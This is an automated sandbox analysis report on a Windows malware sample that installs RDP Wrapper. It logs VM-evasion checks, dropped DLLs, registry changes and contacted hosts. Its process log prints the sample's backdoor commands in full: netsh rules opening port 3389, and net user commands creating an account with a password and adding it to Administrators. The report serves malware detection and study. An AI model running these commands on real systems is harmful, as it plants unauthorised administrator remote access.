                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeFile created: C:\Program Files\RDP Wrapper\rdpwrap.dllJump to dropped file
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeFile created: C:\Users\user\AppData\Local\Temp\RDPWInst.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeFile created: C:\Windows\System32\rfxvmt.dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeFile created: C:\Windows\System32\rfxvmt.dllJump to dropped file
                            Source: C:\Windows\System32\drivers\tsusbhub.sysRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\tsusbhub\Parameters\WdfJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\TermService\ParametersJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 8_2_0043B58C OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,StartServiceW,GetLastError,Sleep,StartServiceW,CloseServiceHandle,CloseServiceHandle,8_2_0043B58C
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

                            Malware Analysis System Evasion

                            barindex
                            Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Size FROM Win32_DiskDrive
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeMemory allocated: 2AD0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeMemory allocated: 2CF0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeMemory allocated: 2B00000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: OpenSCManagerW,GetLastError,EnumServicesStatusExW,GetLastError,CloseServiceHandle,EnumServicesStatusExW,CloseServiceHandle,GetLastError,CloseServiceHandle,8_2_0043B7D4
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeWindow / User API: threadDelayed 7636Jump to behavior
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeWindow / User API: threadDelayed 2338Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeDropped PE file which has not been started: C:\Program Files\RDP Wrapper\rdpwrap.dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeDropped PE file which has not been started: C:\Windows\System32\rfxvmt.dllJump to dropped file
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exe TID: 6212Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exe TID: 4524Thread sleep count: 7636 > 30Jump to behavior
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exe TID: 4524Thread sleep count: 2338 > 30Jump to behavior
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT NumberOfCores FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 8_2_004092D8 FindFirstFileW,FindClose,8_2_004092D8
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 8_2_0040F73C FindFirstFileW,FindClose,8_2_0040F73C
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 8_2_00408EB9 lstrcpynW,FindFirstFileW,FindClose,lstrlenW,lstrcpynW,lstrlenW,lstrcpynW,8_2_00408EB9
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 8_2_00409D02 GetSystemInfo,8_2_00409D02
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: Amcache.hve.38.drBinary or memory string: VMware
                            Source: Amcache.hve.38.drBinary or memory string: VMware Virtual USB Mouse
                            Source: Amcache.hve.38.drBinary or memory string: vmci.syshbin
                            Source: Amcache.hve.38.drBinary or memory string: VMware-42 27 c5 9a 47 85 d6 84-53 49 ec ec 87 a6 6d 67
                            Source: Amcache.hve.38.drBinary or memory string: VMware, Inc.
                            Source: hloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002D9F000.00000004.00000800.00020000.00000000.sdmp, hloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002DAD000.00000004.00000800.00020000.00000000.sdmp, net1.exe, 0000001C.00000002.1770023496.0000000003208000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: *Hyper-V Administrators
                            Source: Amcache.hve.38.drBinary or memory string: VMware20,1hbin@
                            Source: Amcache.hve.38.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                            Source: Amcache.hve.38.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                            Source: Amcache.hve.38.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                            Source: Amcache.hve.38.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                            Source: Amcache.hve.38.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                            Source: Amcache.hve.38.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                            Source: hloRQZmlfg.exe, 00000000.00000002.1919496760.0000000000F5D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll!
                            Source: Amcache.hve.38.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                            Source: net1.exe, 0000001C.00000002.1770023496.0000000003208000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Administrators
                            Source: Amcache.hve.38.drBinary or memory string: vmci.sys
                            Source: net1.exe, 0000001C.00000002.1770023496.0000000003208000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Administrators9+h
                            Source: Amcache.hve.38.drBinary or memory string: vmci.syshbin`
                            Source: Amcache.hve.38.drBinary or memory string: \driver\vmci,\driver\pci
                            Source: Amcache.hve.38.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                            Source: Amcache.hve.38.drBinary or memory string: VMware20,1
                            Source: Amcache.hve.38.drBinary or memory string: Microsoft Hyper-V Generation Counter
                            Source: Amcache.hve.38.drBinary or memory string: NECVMWar VMware SATA CD00
                            Source: Amcache.hve.38.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                            Source: Amcache.hve.38.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                            Source: Amcache.hve.38.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                            Source: Amcache.hve.38.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                            Source: Amcache.hve.38.drBinary or memory string: VMware PCI VMCI Bus Device
                            Source: Amcache.hve.38.drBinary or memory string: VMware VMCI Bus Device
                            Source: Amcache.hve.38.drBinary or memory string: VMware Virtual RAM
                            Source: Amcache.hve.38.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                            Source: Amcache.hve.38.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                            Source: C:\Windows\System32\drivers\tsusbhub.sysSystem information queried: ModuleInformationJump to behavior
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeMemory allocated: page read and write | page guardJump to behavior
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c net userJump to behavior
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c "C:\Users\user\AppData\Local\Temp\RDPWInst.exe" -iJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net userJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 userJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\RDPWInst.exe C:\Users\user\AppData\Local\Temp\RDPWInst.exe -iJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeProcess created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allowJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net user RDPUser_1e47a393 GEdtvn58rfdr /addJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user RDPUser_1e47a393 GEdtvn58rfdr /addJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net localgroupJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroupJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net localgroup "Administrators" RDPUser_1e47a393 /addJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup "Administrators" RDPUser_1e47a393 /addJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: GetUserDefaultUILanguage,GetLocaleInfoW,8_2_004093C0
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,8_2_00408908
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: GetLocaleInfoW,8_2_00412C4A
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: GetLocaleInfoW,8_2_00412C4C
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: GetLocaleInfoW,8_2_00412C98
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeQueries volume information: C:\Users\user\Desktop\hloRQZmlfg.exe VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 8_2_00411154 GetLocalTime,8_2_00411154
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 8_2_00414698 GetVersionExW,8_2_00414698
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                            Lowering of HIPS / PFW / Operating System Security Settings

                            barindex
                            Modifies the windows firewall
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeProcess created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
                            Uses netsh to modify the Windows network and firewall settings
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeProcess created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
                            Source: Amcache.hve.38.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                            Source: Amcache.hve.38.drBinary or memory string: msmpeng.exe
                            Source: Amcache.hve.38.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                            Source: Amcache.hve.38.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                            Source: Amcache.hve.38.drBinary or memory string: MsMpEng.exe

                            Remote Access Functionality

                            barindex
                            Allows multiple concurrent remote connection
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\Licensing Core EnableConcurrentSessionsJump to behavior
                            Enables remote desktop connection
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server fDenyTSConnectionsJump to behavior

                            Mitre Att&ck Matrix

                            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                            Gather Victim Identity InformationAcquire InfrastructureValid Accounts111
                            Windows Management Instrumentation                            		1
                            LSASS Driver                            		1
                            LSASS Driver                            		21
                            Disable or Modify Tools                            		OS Credential Dumping1
                            System Time Discovery                            		2
                            Remote Desktop Protocol                            		1
                            Archive Collected Data                            		14
                            Ingress Tool Transfer                            		Exfiltration Over Other Network MediumAbuse Accessibility Features
                            CredentialsDomainsDefault Accounts2
                            Command and Scripting Interpreter                            		1
                            DLL Side-Loading                            		1
                            DLL Side-Loading                            		1
                            Deobfuscate/Decode Files or Information                            		LSASS Memory1
                            System Service Discovery                            		Remote Desktop ProtocolData from Removable Media11
                            Encrypted Channel                            		Exfiltration Over BluetoothNetwork Denial of Service
                            Email AddressesDNS ServerDomain Accounts2
                            Service Execution                            		1
                            Create Account                            		1
                            Access Token Manipulation                            		31
                            Obfuscated Files or Information                            		Security Account Manager2
                            File and Directory Discovery                            		SMB/Windows Admin SharesData from Network Shared Drive1
                            Non-Standard Port                            		Automated ExfiltrationData Encrypted for Impact
                            Employee NamesVirtual Private ServerLocal AccountsCron21
                            Windows Service                            		21
                            Windows Service                            		12
                            Software Packing                            		NTDS128
                            System Information Discovery                            		Distributed Component Object ModelInput Capture4
                            Non-Application Layer Protocol                            		Traffic DuplicationData Destruction
                            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script11
                            Process Injection                            		1
                            Timestomp                            		LSA Secrets221
                            Security Software Discovery                            		SSHKeylogging15
                            Application Layer Protocol                            		Scheduled TransferData Encrypted for Impact
                            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                            DLL Side-Loading                            		Cached Domain Credentials141
                            Virtualization/Sandbox Evasion                            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items22
                            Masquerading                            		DCSync1
                            Application Window Discovery                            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job141
                            Virtualization/Sandbox Evasion                            		Proc Filesystem1
                            System Network Configuration Discovery                            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                            Access Token Manipulation                            		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron11
                            Process Injection                            		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                            Behavior Graph

                            Hide Legend

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet
                            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1528586 Sample: hloRQZmlfg.exe Startdate: 08/10/2024 Architecture: WINDOWS Score: 100 68 hansgborn.eu 2->68 70 api.ipify.org 2->70 78 Multi AV Scanner detection for domain / URL 2->78 80 Antivirus / Scanner detection for submitted sample 2->80 82 Multi AV Scanner detection for dropped file 2->82 84 8 other signatures 2->84 9 hloRQZmlfg.exe 15 3 2->9         started        14 rdpdr.sys 8 2->14         started        16 rdpvideominiport.sys 4 2->16         started        18 tsusbhub.sys 3 2->18         started        signatures3 process4 dnsIp5 72 8.46.123.33, 3389, 49711 AS-PUBMATICUS United States 9->72 74 147.45.44.104, 49706, 80 FREE-NET-ASFREEnetEU Russian Federation 9->74 76 3 other IPs or domains 9->76 60 C:\Users\user\AppData\Local\...\RDPWInst.exe, PE32 9->60 dropped 88 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 9->88 20 cmd.exe 1 9->20         started        22 cmd.exe 1 9->22         started        25 cmd.exe 1 9->25         started        27 4 other processes 9->27 file6 signatures7 process8 file9 30 RDPWInst.exe 2 5 20->30         started        34 conhost.exe 20->34         started        86 Adds a new user with administrator rights 22->86 36 net.exe 1 22->36         started        38 conhost.exe 22->38         started        40 net.exe 1 25->40         started        42 conhost.exe 25->42         started        62 C:\ProgramData\Microsoft\...\Report.wer, Unicode 27->62 dropped 44 net.exe 1 27->44         started        46 net.exe 1 27->46         started        48 4 other processes 27->48 signatures10 process11 file12 64 C:\Program Files\RDP Wrapper\rdpwrap.dll, PE32+ 30->64 dropped 66 C:\Windows\System32\rfxvmt.dll, PE32+ 30->66 dropped 90 Multi AV Scanner detection for dropped file 30->90 92 Machine 